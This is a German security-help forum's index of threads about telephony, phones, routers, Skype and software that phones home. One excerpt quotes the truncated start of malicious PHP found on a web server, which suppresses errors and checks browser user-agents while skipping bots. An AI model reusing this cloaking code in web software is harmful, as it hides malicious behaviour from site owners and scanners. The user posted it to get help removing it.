Zurück   Trojaner-Board > Themen

Alles zum Thema: Telefonieren

  Letzter Beitrag Antworten Hits Forum
Spam
Telefonieren - Hallo zusammen, ohne die Webseite und den Shop zu nennen suche ich für meinen Onlineshop (Wordpress mit Woocommerce) einen Admin, der sich damit auskennt. Es geht immer wieder um kleine Veränderungen und Anpassungen sowie den Woocommerce. Ich würde mich freuen, wenn du mir kurz deine Telefon...
Mülltonne
SIM-Karte wird in Zukunft technisch nicht mehr unterstützt
Telefonieren - Tach! Hab hier noch ein altes Handy, also kein Smartfone, mit alter SIM-Karte. Das nutze ich nur für SMS und als Notfalltelefon. Eben bekam ich eine SMS von vodafone mit dem Hinweis, dass die Karte bald nicht mehr technisch unterstützt wird. Kennt das jemand? Meine Fragen: 1.) Muss das...
Smartphone, Tablet & Handy Security
Iphone gehackt, extreme temperatur, Knacken beim telefonieren, Gesprächsabbrüche
Telefonieren - Hallo Zusammen, mein iPhone XS wird zurzeit immer wieder beim normalen surfen extrem heiß. Wenn ich telefonieren gibt es sehr häufig Gesprächsabbrüche und es ist wiederholtes knacken beim telefonieren zu hören. Meine Frage, iPhones sollen vor Hacks doch sicher sein, ist das so ? Meine Firma...
Smartphone, Tablet & Handy Security
Thunderbird will nicht von mir stammende Mail versenden
Telefonieren - Etwa 2 bis 3 mal im Monat erscheint bei mir in Thunderbird eine Fehlermeldung, dass eine Mail nicht versendet werden konnte. Ich hatte dann jeweils weder eine Mail verfasst noch eine im Ausgangspostfach liegen. Ich hatte schon einmal die log-Funktionen von Thunderbird aktiviert, um zu erfahren, um...
Plagegeister aller Art und deren Bekämpfung
Windows 10 Internet bricht bei Belastung ab
Telefonieren - Ich hoffe einer von euch kann mir mit meinem Leiden helfen. O2 und Telekom wissen auch nicht mehr weiter. Zu meinem Problem: Wenn ich etwas runterlade z.b bei Steam ein Update oder Spiel, bekommen keine weiteren Programme auf meinem Rechner und keine weiteren Geräte mehr Internet selbst...
Netzwerk und Hardware
PC hat Probleme mit dem Headset/ Kein Sound bei Skypetelefonie
Telefonieren - Hallo, seit geraumer Zeit habe ich ein Problem mit meinem Headset bzw. PC. Irgendwie scheint dieser mein Headset nicht richtig zu erkennen. Entweder hört mich mein Freund, während wir über Skype telefonieren nciht oder umgekehrt. Teilweise hören wir uns sogar gar nicht. Wenn ich z.b. mitten in der...
Netzwerk und Hardware
Neuer Router und Leitung Teufelskreis
Telefonieren - Hallo :) Die Telekom stellt gerade um also wird kein Splitter mehr benötigt. Eine neue Leitung ist da. Nun ist alles richtig angeschlossen ich verbindr mich mit dem Router und will die neuen Zugangsdaten eingeben. Dort steht nun dass die Daten überprüft werden und zwar über das Internet, welches ja...
Diskussionsforum
Schadsoftware auf Webserver (PHP)
Telefonieren - Auf einem Webserver fand ich folgenden Schadcode: #c18fce# error_reporting(0); ini_set('display_errors',0); $wp_j6451 = @$_SERVER; if (( preg_match ('/Gecko|MSIE/i', $wp_j6451) && !preg_match ('/bot/i', $wp_j6451))){...
Alles rund um Mac OSX & Linux
Win32/Small.ca auf dem Computer und Bluescreens
Telefonieren - Schönen guten Morgen, gestern habe ich von Windows Defender den Hinweis bekommen, das sich auf meinem Computer der Win32/Small.ca befindet. Mein Virenscanner schlug bisher nicht an, aber kurz nach dem Hinweis stürzte der PC mit einem Bluescreen ab. Ich hoffe, das Ihr mir weiterhelfen...
Log-Analyse und Auswertung
Malwarebytes "blockt" immer einer chinesische IP ... Ausgehend .. findet aber nix ..
Telefonieren - Hallo Trojaner Cracks, mich warnt schon ein paar Tag MB mit IP: 60.195.249.214 ausgehend geblockt ... GUT MB warnt (und macht auch hoffentlich wirklich "zu" ) aber welcher "Schlingel" will da nach Hause telefonieren??? Habe mal per MB gescannt, Spybot drübergelassen, ESET saußen lassen. ......
Plagegeister aller Art und deren Bekämpfung
Geräte im Bett schädlich?
Telefonieren - Hallo, ich habe heute von meiner Freundin erfahren, dass z.b dass telefonieren mit Handys gefährlich sein kann, wegen den Strahlungen... Naja, ich telefoniere kaum mit dem Handy vielleich 2-3 mal in der Woche oder so unter 1 minute. Nun zu meiner Fragewenn ich , z.b abends mir videos...
Diskussionsforum
Alles nichtbenötigte internetzeug abstellen da nur 60 kb/s vorhanden!
Telefonieren - möcht alles was nicht unbedingt internet braucht abstellen hauptsächlich versteckte DIENSTE DIE NACH "HAUSE TELEFONIEREN! hab imoment nur UMTS internet mit ner vorsintflutliche bandbreit von 60 kb/s! deshalb muss alles nicht benötigte temopär abgestellt werden
Alles rund um Windows
Signatur für Ursprung einer Datei?
Telefonieren - Hallo zusammen, ich wollte mal fragen, ob es eine Möglichkeit gibt, einer Datei (z.B. eine DLL) eine Signatur mitzugeben, mit der andere Programme (z.B. Anti-Viren-Programme) erkennen können, welchen Ursprung sie besitzen. Der konkrete Fall würde dann so aussehn: - Ein Benutzer installiert...
Diskussionsforum
Rndll.exe Trojaner durch MSN was tun
Telefonieren - Hallo an Alle. alos seit ein paar Tagen habe ich folgendes Problem egal was ich tue mein MSN geht von alleine an zum glück habe ich kein Passwort gespeichert sprich es ist nur als nicht angemeldet in der taskleiste in dem Augenblick wo es das tut geht meine downloadrate in den keller und wenn...
Plagegeister aller Art und deren Bekämpfung
CScript.exe will mailen
Telefonieren - hallo Ich habe bei mir zu Hause WIN2003 SP2 aufgesetzt und alle online updates gemacht. C:\WINDOWS\System32\CScript.exe von diesem server will unbedingt immer wieder mailen, wird aber durch den virenscanner gestoppt: Blockiert durch Port-Blockierungsregel...
Alles rund um Windows
Kleingedrucktes!
Telefonieren - Ich möchte nur etwas nachfragen. Aber erst einmal die vorgeschichte! Also ich hab mal nen vertrag abgeschlossen laufzeit 24 monate der ist jetzt 9 monate vorm auslaufen! Aber das ist sau teuer! DA es keine dsl flat ist! Die 80 € im monat sind zu viel und da dachte ich wechseln wir nich den...
Überwachung, Datenschutz und Spam
Ein Virus der etwas anderen Art?!
Telefonieren - Hi Leute, seit einiger Zeit spiele ich Crysis im Internet und telefonieren dabei mit einem Freund über Skype. Jetzt ist es schon des öfteren passiert, dass, während ich gespielt und telefoniert habe, türkische bzw orientalische Musik im Hintergrund abgelaufen ist. Auf meinem PC lief kein Programm...
Plagegeister aller Art und deren Bekämpfung
Skype-Software
Telefonieren - Hallo! Ich hab überlegt wo ich dieses Thema reinstellen soll, dachte dann es passt am ehesten zu Windowssoftware... Ich habe zum Testen mit der Skype Software (gerade eben installiert, noch ohne Guthaben) meine eigene Festnetznummer angerufen... Ich konnte problemlos telefonieren, bekomme...
Alles rund um Windows
Seltenes Problem mit Speedport W 700 V Router
Telefonieren - Hallo ans Board, also ich habe hier ein problem das mir so bisher noch nicht untergekommen ist. Ich wollte gestern bei einem Freund einen Speedport W 700 V installieren und in Gang bringen. Also alles angeschlossen , die Daten eingegeben und gewartet bis die DSL und die Online Lampe leuchten....
Netzwerk und Hardware
Analog-Anschluss = 2 Telefone?
Telefonieren - Hallo Forum. :) Eigentlich das falsche Forum für diese Frage, aber ich meine das unser "Schatten" (:rolleyes: ) mir da weiterhelfen kann... Also folgende Frage, wir haben eine Wohnung auf 2 Etagen, im oberen Teil ist eine TAE-NFN Dose angebracht, wo auch der Splitter angeschlossen und somit...
Netzwerk und Hardware
Anfänger-Mobiltelefon
Telefonieren - Nicht, dass ich nicht gegooglet hätte und Infos herangezogen hätte - aber alle haben sie nicht das, was ich will: Ein normales, kleines, leichtes, hosentaschentaugliches Mobiltelefon, das außer telefonieren nicht viel kann, und das ich im Ausland mit einer x-beliebigen 15€ sim-Karte eines lokalen...
Netzwerk und Hardware
skype - hab ich nen Knoten?
Telefonieren - Hallo zusammen, wie im Titel bereits beschrieben, interressiere ich mich für den Skype-messenger. Vor kurzem erst entdeckt (bin kein vollblut-messenger-chatter), war ich doch sehr angetan von diesen schönen Funktionen wie telefonie, videotelefonie, dateitansfer und so.:aplaus: Mir scheint das...
Überwachung, Datenschutz und Spam
Firewall tunneln
Telefonieren - Hallo zusammen Ich war am wochende auf ner Lan-party! Auf der versprochen wurde das uns internet zurverfügung steht. ICQ usw. Darauf hin hab ich mich daruf eingestellt das ich mit meiner freundin, die zuhause geblieben ist, chatte .Da aber am wochende ein Steam update erschiene ist, musten alle...
Antiviren-, Firewall- und andere Schutzprogramme
ISDN-Karte nur zum Telefonieren nutzen, Internet sperren...
Telefonieren - Hallo! Ich habe ne DSL-Flatrate und habe mir nun - nur zum Telefonieren - ne ISDN-karte gekauft. Jetzt habe ich ein wenig Sorge, dass ich mir irgendwas einfange, was sich über meine - immer an die ISDN-Leitung angeschlossene - ISDN-Karte irgendwo einwählt. Gibt es eine Möglichkeit / ein Tool,...
Antiviren-, Firewall- und andere Schutzprogramme
Norton Intelligent Updater telefoniert nach Hause?
Telefonieren - Hallo Leute, ich benutze schon seit Jahren Norton Produkte wie unter anderem auch Norton Antivirus 2003. Seit ein paar Wochen fällt mir auf das meine Firewall immer eine ausgehende Verbindung der Updatedatei erkennt und blockiert wenn ich die Signatur-Update Datei (Intelligent Updater) von...
Antiviren-, Firewall- und andere Schutzprogramme
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.